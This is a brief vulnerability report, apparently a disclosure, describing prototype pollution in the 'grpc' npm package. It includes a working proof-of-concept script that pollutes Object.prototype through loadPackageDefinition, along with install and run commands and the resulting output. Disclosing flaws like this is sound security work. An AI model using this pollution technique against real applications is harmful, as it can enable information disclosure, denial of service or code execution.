grpc
native core package is vulnerable to Prototype Pollution
.
This package allowing for modification of prototype behavior, which may result in Information Disclosure/DoS/RCE.
// poc.js
var grpc =require('grpc')
grpc.loadPackageDefinition({'constructor.prototype.polluted': "Yes! Its Polluted"});
console.log({}.polluted)
npm i grpc # Install affected module
node poc.js # Run the PoC
[Function: ServiceClient] { service: 'Yes! Its Polluted' }